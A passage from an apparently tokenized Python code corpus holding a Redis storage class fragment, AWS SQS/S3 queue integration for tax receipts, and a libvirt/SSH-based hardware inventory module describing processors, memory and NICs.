BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( self . expId , bucket , self . 
subId ) <EOL> redis_key = '<STR_LIT:%s>' <EOL> val_dict = { '<STR_LIT>' : rows [ i ] . tolist ( ) } <EOL> pipe . hset ( bucketKey , redis_key % indexes [ i ] , json . dumps ( val_dict ) ) <EOL> pipe . execute ( ) <EOL> def delete ( self , expId , subId ) : <EOL> pipe = self . conn . pipeline ( ) <EOL> length = int ( self . conn . get ( EXP_LENGTH % ( expId , subId ) ) ) <EOL> length /= BUCKET_LIMIT <EOL> for i in range ( length + <NUM_LIT:1> ) : <EOL> pipe . delete ( BUCKET_KEY % ( self . expId , i , subId ) ) <EOL> pipe . delete ( EXP_LENGTH % ( expId , subId ) ) <EOL> pipe . execute ( ) <EOL> def exists ( self , expId , subId ) : <EOL> return self . conn . exists ( EXP_LENGTH % ( expId , subId ) ) <EOL> def getExpId ( self ) : <EOL> return self . expId <EOL> def memory ( self ) : <EOL> return self . conn . info ( ) [ '<STR_LIT>' ] <EOL> def deleteAll ( self ) : <EOL> return self . conn . flushall ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from util . config import ConfigReader <EOL> from threading import Thread <EOL> from boto import sqs , s3 <EOL> import time <EOL> import logging <EOL> import traceback <EOL> class BaseServiceIntegration ( object ) : <EOL> def __init__ ( self ) : <EOL> self . config = ConfigReader ( ) <EOL> self . logger = logging . getLogger ( __name__ ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> self . default_region = self . config . get_property ( <EOL> self . config . SECTION_AWS_ACCOUNT , <EOL> self . config . OPTION_DEFAULT_REGION <EOL> ) <EOL> class BaseSimpleQueueServiceIntegration ( BaseServiceIntegration ) : <EOL> def __init__ ( self ) : <EOL> super ( BaseSimpleQueueServiceIntegration , self ) . __init__ ( ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> self . conn = sqs . connect_to_region ( self . default_region ) <EOL> def send_message ( self , queue_name , message_body ) : <EOL> self . logger . info ( "<STR_LIT>" % ( queue_name , message_body ) ) <EOL> queue = self . conn . get_queue ( queue_name ) <EOL> self . conn . send_message ( queue , message_body ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> class SimpleQueueServiceIntegration ( BaseSimpleQueueServiceIntegration ) : <EOL> def __init__ ( self , queue_name_in = None , queue_name_out = None ) : <EOL> super ( SimpleQueueServiceIntegration , self ) . __init__ ( ) <EOL> self . queue_name_in = queue_name_in <EOL> self . queue_name_out = queue_name_out <EOL> def handle_queue_in_message ( self , queue_name_in , <EOL> handle_process_message , <EOL> handle_queue_out_message ) : <EOL> queue_in = self . conn . get_queue ( queue_name_in ) <EOL> while True : <EOL> rs = queue_in . get_messages ( ) <EOL> for message in rs : <EOL> self . logger . info ( '<STR_LIT>' % ( queue_in . name , message . get_body ( ) ) ) <EOL> try : <EOL> ret_value = handle_process_message ( message . get_body ( ) ) <EOL> queue_in . 
delete_message ( message ) <EOL> handle_queue_out_message ( ret_value ) <EOL> except Exception : <EOL> self . logger . error ( '<STR_LIT>' ) <EOL> traceback . print_exc ( ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def handle_process_message ( self , message_body ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def handle_queue_out_message ( self , response_body ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def start_listening ( self ) : <EOL> self . logger . info ( '<STR_LIT>' % self . queue_name_in ) <EOL> thread_sqs = Thread ( target = self . handle_queue_in_message , <EOL> args = ( <EOL> self . queue_name_in , <EOL> self . handle_process_message , <EOL> self . handle_queue_out_message , <EOL> ) ) <EOL> thread_sqs . daemon = True <EOL> thread_sqs . start ( ) <EOL> return thread_sqs <EOL> class SimpleStorageServiceIntegration ( BaseServiceIntegration ) : <EOL> def __init__ ( self ) : <EOL> super ( SimpleStorageServiceIntegration , self ) . __init__ ( ) <EOL> bucket_name = self . config . get_property ( <EOL> self . config . SECTION_AWS_S3 , self . config . OPTION_BUCKET_NAME ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> conn = s3 . connect_to_region ( self . default_region ) <EOL> self . logger . debug ( "<STR_LIT>" % bucket_name ) <EOL> self . bucket = conn . get_bucket ( bucket_name ) <EOL> def list ( self ) : <EOL> return self . bucket . list ( ) <EOL> def download_file ( self , key , dst_filename ) : <EOL> self . logger . debug ( "<STR_LIT>" % key ) <EOL> key = self . bucket . get_key ( key ) <EOL> key . get_contents_to_filename ( dst_filename ) <EOL> class TaxReceiptSimpleQueueServiceIntegration ( SimpleQueueServiceIntegration ) : <EOL> def __init__ ( self , handle_process_message_function , handle_queue_out_message_function ) : <EOL> super ( TaxReceiptSimpleQueueServiceIntegration , self ) . __init__ ( ) <EOL> self . queue_name_in = self . config . get_property ( <EOL> self . config . SECTION_AWS_SQS , self . config . 
OPTION_QUEUE_NAME_IN ) <EOL> self . queue_name_out = self . config . get_property ( <EOL> self . config . SECTION_AWS_SQS , self . config . OPTION_QUEUE_NAME_OUT ) <EOL> if not handle_process_message_function is None : <EOL> self . handle_process_message_function = handle_process_message_function <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not handle_queue_out_message_function is None : <EOL> self . handle_queue_out_message_function = handle_queue_out_message_function <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def handle_process_message ( self , message_body ) : <EOL> return self . handle_process_message_function ( self . queue_name_in , message_body ) <EOL> def handle_queue_out_message ( self , response_body ) : <EOL> return self . handle_queue_out_message_function ( self . queue_name_out , response_body ) </s>
<s> import code <EOL> '''<STR_LIT>''' <EOL> __author__ = "<STR_LIT>" <EOL> from definitionsClass import definitionsClass <EOL> from auxiliary_functions import get_ssh_connection <EOL> import libvirt <EOL> from xml . etree import ElementTree <EOL> import paramiko <EOL> import re <EOL> import yaml <EOL> def getCredentials ( creds , data ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" , creds , data <EOL> for cred in creds : <EOL> print cred [ <NUM_LIT:1> ] + "<STR_LIT>" , <EOL> if cred [ <NUM_LIT:0> ] == libvirt . VIR_CRED_AUTHNAME : <EOL> cred [ <NUM_LIT:4> ] = data <EOL> elif cred [ <NUM_LIT:0> ] == libvirt . VIR_CRED_PASSPHRASE : <EOL> cred [ <NUM_LIT:4> ] = data <EOL> else : <EOL> return - <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> class RADclass ( ) : <EOL> def __init__ ( self ) : <EOL> self . name = None <EOL> self . machine = None <EOL> self . user = None <EOL> self . password = None <EOL> self . nodes = dict ( ) <EOL> self . nr_processors = None <EOL> self . processor_family = None <EOL> self . processor_manufacturer = None <EOL> self . processor_version = None <EOL> self . processor_features = None <EOL> self . memory_type = None <EOL> self . memory_freq = None <EOL> self . memory_nr_channels = None <EOL> self . memory_size = None <EOL> self . memory_hugepage_sz = None <EOL> self . hypervisor = Hypervisor ( ) <EOL> self . os = OpSys ( ) <EOL> self . ports_list = list ( ) <EOL> def obtain_RAD ( self , user , password , machine ) : <EOL> """<STR_LIT>""" <EOL> warning_text = "<STR_LIT>" <EOL> try : <EOL> ( return_status , code ) = get_ssh_connection ( machine , user , password ) <EOL> if not return_status : <EOL> print '<STR_LIT>' , code <EOL> return ( return_status , code ) <EOL> ssh_conn = code <EOL> self . connection_IP = machine <EOL> virsh_conn = libvirt . open ( "<STR_LIT>" + user + '<STR_LIT:@>' + machine + "<STR_LIT>" ) <EOL> machine_name = get_hostname ( virsh_conn ) <EOL> ( return_status , code ) = self . 
set_name ( machine_name ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> processors = dict ( ) <EOL> ( return_status , code ) = get_processor_information ( ssh_conn , virsh_conn , processors ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> memory_nodes = dict ( ) <EOL> ( return_status , code ) = get_memory_information ( ssh_conn , virsh_conn , memory_nodes ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> nic_topology = dict ( ) <EOL> ( return_status , code ) = get_nic_information ( ssh_conn , virsh_conn , nic_topology ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> for socket_id , processor in processors . iteritems ( ) : <EOL> node = Node ( ) <EOL> if not socket_id in nic_topology : <EOL> nic_topology [ socket_id ] = list ( ) <EOL> ( return_status , code ) = node . set ( processor , memory_nodes [ socket_id ] , nic_topology [ socket_id ] ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> ( return_status , code ) = self . insert_node ( node ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> if code not in warning_text : <EOL> warning_text += code <EOL> os = OpSys ( ) <EOL> ( return_status , code ) = get_os_information ( ssh_conn , os ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> ( return_status , code ) = self . 
set_os ( os ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> hypervisor = Hypervisor ( ) <EOL> ( return_status , code ) = get_hypervisor_information ( virsh_conn , hypervisor ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> ( return_status , code ) = self . set_hypervisor ( hypervisor ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> ssh_conn . close ( ) <EOL> return ( True , warning_text ) <EOL> except libvirt . libvirtError , e : <EOL> text = e . get_error_message ( ) <EOL> print '<STR_LIT>' , text <EOL> return ( False , text ) <EOL> except paramiko . ssh_exception . SSHException , e : <EOL> text = e . args [ <NUM_LIT:0> ] <EOL> print "<STR_LIT>" , text <EOL> return False , text <EOL> def set_name ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( name , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . name = name <EOL> return ( True , "<STR_LIT>" ) <EOL> def set_connection_info ( self , machine , user , password ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( machine , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( user , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> ( self . machine , self . user , self . password ) = ( machine , user , password ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def insert_node ( self , node ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( node , Node ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if node . id_ in self . nodes : <EOL> return ( False , '<STR_LIT>' ) <EOL> for port_key in node . ports_list : <EOL> if port_key in self . ports_list : <EOL> return ( False , '<STR_LIT>' + port_key + '<STR_LIT>' ) <EOL> self . ports_list . append ( port_key ) <EOL> self . nodes [ node . id_ ] = node <EOL> self . 
update_variables ( ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def update_variables ( self ) : <EOL> """<STR_LIT>""" <EOL> warning_text = "<STR_LIT>" <EOL> self . nr_processors = len ( self . nodes ) <EOL> prev_processor_family = prev_processor_manufacturer = prev_processor_version = prev_processor_features = None <EOL> different_processor_family = different_processor_manufacturer = different_processor_version = different_processor_features = False <EOL> for node in self . nodes . itervalues ( ) : <EOL> ( self . processor_family , self . processor_manufacturer , self . processor_version , self . processor_features ) = node . get_processor_info ( ) <EOL> if prev_processor_family != None and self . processor_family != prev_processor_family : <EOL> different_processor_family = True <EOL> if prev_processor_manufacturer != None and self . processor_manufacturer != prev_processor_manufacturer : <EOL> different_processor_manufacturer = True <EOL> if prev_processor_version != None and self . processor_version != prev_processor_version : <EOL> different_processor_version = True <EOL> if prev_processor_features != None and self . processor_features != prev_processor_features : <EOL> different_processor_features = True <EOL> ( prev_processor_family , prev_processor_manufacturer , prev_processor_version , prev_processor_features ) = ( self . processor_family , self . processor_manufacturer , self . processor_version , self . processor_features ) <EOL> if different_processor_family : <EOL> self . processor_family = None <EOL> if different_processor_features : <EOL> self . processor_features = None <EOL> if different_processor_manufacturer : <EOL> self . processor_manufacturer = None <EOL> if different_processor_version : <EOL> self . processor_version = None <EOL> self . 
memory_size = <NUM_LIT:0> <EOL> different_memory_freq = different_memory_nr_channels = different_memory_type = different_memory_hugepage_sz = False <EOL> prev_memory_freq = prev_memory_nr_channels = prev_memory_type = prev_memory_hugepage_sz = None <EOL> for node in self . nodes . itervalues ( ) : <EOL> ( self . memory_freq , self . memory_nr_channels , self . memory_type , memory_size , self . memory_hugepage_sz ) = node . get_memory_info ( ) <EOL> self . memory_size += memory_size <EOL> if prev_memory_freq != None and self . memory_freq != prev_memory_freq : <EOL> different_memory_freq = True <EOL> if prev_memory_nr_channels != None and self . memory_nr_channels != prev_memory_nr_channels : <EOL> different_memory_nr_channels = True <EOL> if prev_memory_type != None and self . memory_type != prev_memory_type : <EOL> different_memory_type = True <EOL> if prev_memory_hugepage_sz != None and self . memory_hugepage_sz != prev_memory_hugepage_sz : <EOL> different_memory_hugepage_sz = True <EOL> ( prev_memory_freq , prev_memory_nr_channels , prev_memory_type , prev_memory_hugepage_sz ) = ( self . memory_freq , self . memory_nr_channels , self . memory_type , self . memory_hugepage_sz ) <EOL> if different_memory_freq : <EOL> self . memory_freq = None <EOL> if different_memory_nr_channels : <EOL> self . memory_nr_channels = None <EOL> if different_memory_type : <EOL> self . memory_type = None <EOL> if different_memory_hugepage_sz : <EOL> warning_text += '<STR_LIT>' <EOL> return ( True , warning_text ) <EOL> def set_hypervisor ( self , hypervisor ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( hypervisor , Hypervisor ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . hypervisor . assign ( hypervisor ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def set_os ( self , os ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( os , OpSys ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . os . 
assign ( os ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + self . name + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> text += '<STR_LIT>' + str ( self . nr_processors ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . processor_family + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . processor_manufacturer + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . processor_version + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . processor_features ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> text += '<STR_LIT>' + self . memory_type + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . memory_freq ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . memory_nr_channels ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . memory_size ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> text += self . hypervisor . to_text ( ) <EOL> text += '<STR_LIT>' <EOL> text += self . os . to_text ( ) <EOL> text += '<STR_LIT>' <EOL> text += '<STR_LIT>' + str ( len ( self . nodes ) ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> for node_k , node_v in self . nodes . iteritems ( ) : <EOL> text += '<STR_LIT>' + str ( node_k ) + '<STR_LIT>' <EOL> text += node_v . to_text ( ) <EOL> return text <EOL> def to_yaml ( self ) : <EOL> return yaml . load ( self . to_text ( ) ) <EOL> class Node ( ) : <EOL> def __init__ ( self ) : <EOL> self . id_ = None <EOL> self . processor = ProcessorNode ( ) <EOL> self . memory = MemoryNode ( ) <EOL> self . nic_list = list ( ) <EOL> self . ports_list = list ( ) <EOL> def get_processor_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . processor . get_info ( ) <EOL> def get_memory_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . memory . get_info ( ) <EOL> def set ( self , processor , memory , nic_list ) : <EOL> ( status , return_code ) = self . processor . assign ( processor ) <EOL> if not status : <EOL> return ( status , return_code ) <EOL> self . 
id_ = processor . id_ <EOL> ( status , return_code ) = self . memory . assign ( memory ) <EOL> if not status : <EOL> return ( status , return_code ) <EOL> for nic in nic_list : <EOL> if not isinstance ( nic , Nic ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . nic_list . append ( nic ) <EOL> for port_key in nic . ports . iterkeys ( ) : <EOL> if port_key in self . ports_list : <EOL> return ( False , '<STR_LIT>' + port_key + '<STR_LIT>' ) <EOL> self . ports_list . append ( port_key ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def assign ( self , node ) : <EOL> """<STR_LIT>""" <EOL> warning_text = "<STR_LIT>" <EOL> processor = node . processor <EOL> memory = node . memory <EOL> nic_list = node . nic_list <EOL> ( status , return_code ) = self . processor . assign ( processor ) <EOL> if not status : <EOL> return ( status , return_code ) <EOL> self . id_ = processor . id_ <EOL> ( status , return_code ) = self . memory . assign ( memory ) <EOL> if not status : <EOL> return ( status , return_code ) <EOL> warning_text += code <EOL> for nic in nic_list : <EOL> if not isinstance ( nic , Nic ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . nic_list . append ( nic ) <EOL> for port_key in nic . ports . iterkeys ( ) : <EOL> if port_key in self . ports_list : <EOL> return ( False , '<STR_LIT>' + port_key + '<STR_LIT>' ) <EOL> self . ports_list . append ( port_key ) <EOL> return ( True , warning_text ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . id_ ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> text += self . processor . to_text ( ) <EOL> text += '<STR_LIT>' <EOL> text += self . memory . to_text ( ) <EOL> if len ( self . nic_list ) > <NUM_LIT:0> : <EOL> text += '<STR_LIT>' <EOL> nic_index = <NUM_LIT:0> <EOL> for nic in self . nic_list : <EOL> text += '<STR_LIT>' + str ( nic_index ) + '<STR_LIT>' <EOL> text += nic . 
to_text ( ) <EOL> nic_index += <NUM_LIT:1> <EOL> return text <EOL> class ProcessorNode ( ) : <EOL> possible_features = definitionsClass . processor_possible_features <EOL> possible_manufacturers = definitionsClass . processor_possible_manufacturers <EOL> possible_families = definitionsClass . processor_possible_families <EOL> possible_versions = definitionsClass . processor_possible_versions <EOL> def __init__ ( self ) : <EOL> self . id_ = None <EOL> self . family = None <EOL> self . manufacturer = None <EOL> self . version = None <EOL> self . features = list ( ) <EOL> self . cores = list ( ) <EOL> self . eligible_cores = list ( ) <EOL> def assign ( self , processor ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( processor , ProcessorNode ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . id_ = processor . id_ <EOL> self . family = processor . family <EOL> self . manufacturer = processor . manufacturer <EOL> self . version = processor . version <EOL> self . features = processor . features <EOL> self . cores = processor . cores <EOL> self . eligible_cores = processor . eligible_cores <EOL> return ( True , "<STR_LIT>" ) <EOL> def set ( self , id_ , family , manufacturer , version , features , cores ) : <EOL> """<STR_LIT>""" <EOL> warning_text = "<STR_LIT>" <EOL> if not isinstance ( id_ , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( family , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( manufacturer , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( version , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( features , list ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( cores , list ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> ( self . id_ , self . family , self . manufacturer , self . version ) = ( id_ , family , manufacturer , version ) <EOL> if not manufacturer in self . 
possible_manufacturers : <EOL> warning_text += "<STR_LIT>" % ( manufacturer , str ( self . possible_manufacturers ) ) <EOL> if not family in self . possible_families : <EOL> warning_text += "<STR_LIT>" % ( family , str ( self . possible_families ) ) <EOL> for feature in features : <EOL> if not feature in self . possible_features : <EOL> warning_text += "<STR_LIT>" % ( feature , str ( self . possible_versions ) ) <EOL> self . features . append ( feature ) <EOL> if '<STR_LIT>' in self . features : <EOL> for iterator in sorted ( cores ) : <EOL> if not isinstance ( iterator , list ) or len ( iterator ) != <NUM_LIT:2> or not isinstance ( iterator [ <NUM_LIT:0> ] , int ) or not isinstance ( iterator [ <NUM_LIT:1> ] , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . cores . append ( iterator ) <EOL> else : <EOL> for iterator in sorted ( cores ) : <EOL> if not isinstance ( iterator , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . cores . append ( iterator ) <EOL> self . set_eligible_cores ( ) <EOL> return ( True , warning_text ) <EOL> def set_eligible_cores ( self ) : <EOL> """<STR_LIT>""" <EOL> not_first = False <EOL> for iterator in self . cores : <EOL> if not_first : <EOL> self . eligible_cores . append ( iterator ) <EOL> else : <EOL> not_first = True <EOL> return <EOL> def get_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . family , self . manufacturer , self . version , self . features ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . id_ ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . family + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . manufacturer + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . version + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . features ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . cores ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . 
eligible_cores ) + '<STR_LIT:\n>' <EOL> return text <EOL> class MemoryNode ( ) : <EOL> def __init__ ( self ) : <EOL> self . modules = list ( ) <EOL> self . nr_channels = None <EOL> self . node_size = None <EOL> self . eligible_memory = None <EOL> self . hugepage_sz = None <EOL> self . hugepage_nr = None <EOL> self . eligible_hugepage_nr = None <EOL> self . type_ = None <EOL> self . freq = None <EOL> self . module_size = None <EOL> self . form_factor = None <EOL> def assign ( self , memory_node ) : <EOL> return self . set ( memory_node . modules , memory_node . hugepage_sz , memory_node . hugepage_nr ) <EOL> def set ( self , modules , hugepage_sz , hugepage_nr ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( modules , list ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( hugepage_sz , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( hugepage_nr , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> ( self . hugepage_sz , self . hugepage_nr ) = ( hugepage_sz , hugepage_nr ) <EOL> self . node_size = self . nr_channels = <NUM_LIT:0> <EOL> different_type = different_freq = different_module_size = different_form_factor = False <EOL> prev_type = prev_freq = prev_module_size = prev_form_factor = None <EOL> for iterator in modules : <EOL> if not isinstance ( iterator , MemoryModule ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . modules . append ( iterator ) <EOL> ( self . type_ , self . freq , self . module_size , self . form_factor ) = ( iterator . type_ , iterator . freq , iterator . size , iterator . form_factor ) <EOL> self . node_size += self . module_size <EOL> self . nr_channels += <NUM_LIT:1> <EOL> if prev_type != None and prev_type != self . type_ : <EOL> different_type = True <EOL> if prev_freq != None and prev_freq != self . freq : <EOL> different_freq = True <EOL> if prev_module_size != None and prev_module_size != self . 
module_size : <EOL> different_module_size = True <EOL> if prev_form_factor != None and prev_form_factor != self . form_factor : <EOL> different_form_factor = True <EOL> ( prev_type , prev_freq , prev_module_size , prev_form_factor ) = ( self . type_ , self . freq , self . module_size , self . form_factor ) <EOL> if different_type : <EOL> self . type_ = None <EOL> if different_freq : <EOL> self . freq = None <EOL> if different_module_size : <EOL> self . module_size = None <EOL> if different_form_factor : <EOL> self . form_factor = None <EOL> ( return_value , error_code ) = self . set_eligible_memory ( ) <EOL> if not return_value : <EOL> return ( return_value , error_code ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def set_eligible_memory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . eligible_memory = self . node_size - <NUM_LIT:2> * <NUM_LIT> * <NUM_LIT> <EOL> if self . eligible_memory < <NUM_LIT:0> : <EOL> return ( False , "<STR_LIT>" ) <EOL> self . eligible_hugepage_nr = self . hugepage_nr <EOL> return ( True , "<STR_LIT>" ) <EOL> def get_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . freq , self . nr_channels , self . type_ , self . node_size , self . hugepage_sz ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . node_size ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . nr_channels ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . eligible_memory ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . hugepage_sz ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . hugepage_nr ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . eligible_hugepage_nr ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . type_ + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . freq ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . module_size ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . form_factor + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> for module in self . 
modules : <EOL> text += module . to_text ( ) <EOL> return text <EOL> class MemoryModule ( ) : <EOL> possible_types = definitionsClass . memory_possible_types <EOL> possible_form_factors = definitionsClass . memory_possible_form_factors <EOL> def __init__ ( self ) : <EOL> self . locator = None <EOL> self . type_ = None <EOL> self . freq = None <EOL> self . size = None <EOL> self . form_factor = None <EOL> def set ( self , locator , type_ , freq , size , form_factor ) : <EOL> """<STR_LIT>""" <EOL> warning_text = "<STR_LIT>" <EOL> if not isinstance ( locator , str ) : <EOL> return ( False , "<STR_LIT>" ) <EOL> if not isinstance ( type_ , str ) : <EOL> return ( False , "<STR_LIT>" ) <EOL> if not isinstance ( form_factor , str ) : <EOL> return ( False , "<STR_LIT>" ) <EOL> if not isinstance ( freq , int ) : <EOL> return ( False , "<STR_LIT>" ) <EOL> if not isinstance ( size , int ) : <EOL> return ( False , "<STR_LIT>" ) <EOL> if not form_factor in self . possible_form_factors : <EOL> warning_text += "<STR_LIT>" % ( form_factor , str ( self . possible_form_factors ) ) <EOL> if not type_ in self . possible_types : <EOL> warning_text += "<STR_LIT>" % ( type_ , str ( self . possible_types ) ) <EOL> ( self . locator , self . type_ , self . freq , self . size , self . form_factor ) = ( locator , type_ , freq , size , form_factor ) <EOL> return ( True , warning_text ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT:U+0020>' + self . locator + '<STR_LIT>' <EOL> text += '<STR_LIT>' + self . type_ + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . freq ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . size ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . form_factor + '<STR_LIT:\n>' <EOL> return text <EOL> class Nic ( ) : <EOL> def __init__ ( self ) : <EOL> self . model = None <EOL> self . 
ports = dict ( ) <EOL> def set_model ( self , model ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( model , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . model = model <EOL> return ( True , "<STR_LIT>" ) <EOL> def add_port ( self , port ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( port , Port ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> port_id = port . pci_device_id <EOL> if port_id in self . ports : <EOL> return ( False , '<STR_LIT>' + port . pci_device_id + '<STR_LIT>' ) <EOL> self . ports [ port_id ] = port <EOL> return ( True , "<STR_LIT>" ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . model ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + '<STR_LIT:\n>' <EOL> for key , port in self . ports . iteritems ( ) : <EOL> text += '<STR_LIT>' + key + '<STR_LIT>' + '<STR_LIT:\n>' <EOL> text += port . to_text ( ) <EOL> return text <EOL> class Port ( ) : <EOL> def __init__ ( self ) : <EOL> self . name = None <EOL> self . virtual = None <EOL> self . enabled = None <EOL> self . eligible = None <EOL> self . speed = None <EOL> self . available_bw = None <EOL> self . mac = None <EOL> self . pci_device_id_split = None <EOL> self . pci_device_id = None <EOL> self . PF_pci_device_id = None <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . pci_device_id ) + '<STR_LIT>' <EOL> text += '<STR_LIT>' + str ( self . virtual ) + '<STR_LIT:\n>' <EOL> if self . virtual : <EOL> text += '<STR_LIT>' + self . PF_pci_device_id + '<STR_LIT>' <EOL> text += '<STR_LIT>' + str ( self . eligible ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . enabled ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . speed ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . available_bw ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . mac ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . name ) + '<STR_LIT:\n>' <EOL> return text <EOL> class Hypervisor ( ) : <EOL> possible_types = definitionsClass . 
